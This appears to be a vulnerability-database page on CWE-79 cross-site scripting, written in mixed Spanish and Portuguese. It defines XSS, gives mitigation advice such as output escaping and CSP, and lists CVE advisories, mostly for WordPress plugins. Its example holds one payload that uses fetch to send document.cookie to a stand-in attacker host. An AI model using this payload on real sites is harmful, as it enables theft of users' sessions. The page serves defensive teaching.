Fallos del tipo CWE-79

29.990 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-33537MEDIUMWordPress WP Portfolio theme <= 2.4 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-32133HIGHWordPress EZ Form Calculator plugin <= 2.14.0.3 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-43792MEDIUMHalo's editor has a stored Cross-Site Scripting vulnerabilityEPSS 0.4%CVE-2026-33955HIGHNotesnook vulnerable to RCE via stored XSS in Note History diff viewerEPSS 0.4%CVE-2024-2835HIGHOpenText ArcSight Enterprise Security Manager and ArcSight Platform Stored XSSEPSS 0.4%CVE-2024-30445MEDIUMWordPress Web Icons plugin <= 1.0.0.10 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-3482HIGHOpenText ArcSight Enterprise Security Manager and ArcSight Platform Stored XSSEPSS 0.4%CVE-2024-29761MEDIUMWordPress WP Post Disclaimer plugin <= 1.0.3 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-29795MEDIUMWordPress Media Cloud for Amazon S3, Cloudflare R2, Google Cloud Storage, DigitalOcean Spaces and more plugin <= 4.5.24 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-49505MEDIUMXSS vulnerability found in OpenSuse MirrorCacheEPSS 0.4%CVE-2024-29769MEDIUMWordPress Portfolio Gallery plugin <= 1.5.6 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2025-54495MEDIUMA reflected cross-site scripting (xss) vulnerability exists in the emailfailedjob functionality of MedDream PACS Premium 7.3.6.870. A speciaEPSS 0.4%CVE-2023-46313HIGHWordPress Zotpress Plugin <= 7.3.4 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2024-10101MEDIUMStored XSS in binary-husky/gpt_academicEPSS 0.4%CVE-2023-4802MEDIUMITM Server Cross-site Scripting in UpdateInstalledSoftware EndpointEPSS 0.4%CVE-2025-22524MEDIUMWordPress فرم ساز فرم افزار Plugin <= 2.0 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-29798MEDIUMWordPress Gratisfaction plugin <= 4.3.4 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-27196HIGHWordPress postMash – custom post order plugin <= 1.2.0 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2024-29762MEDIUMWordPress Off-Canvas Sidebars & Menus (Slidebars) plugin <= 0.5.8.1 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2025-54157MEDIUMA reflected cross-site scripting (xss) vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A speciEPSS 0.4%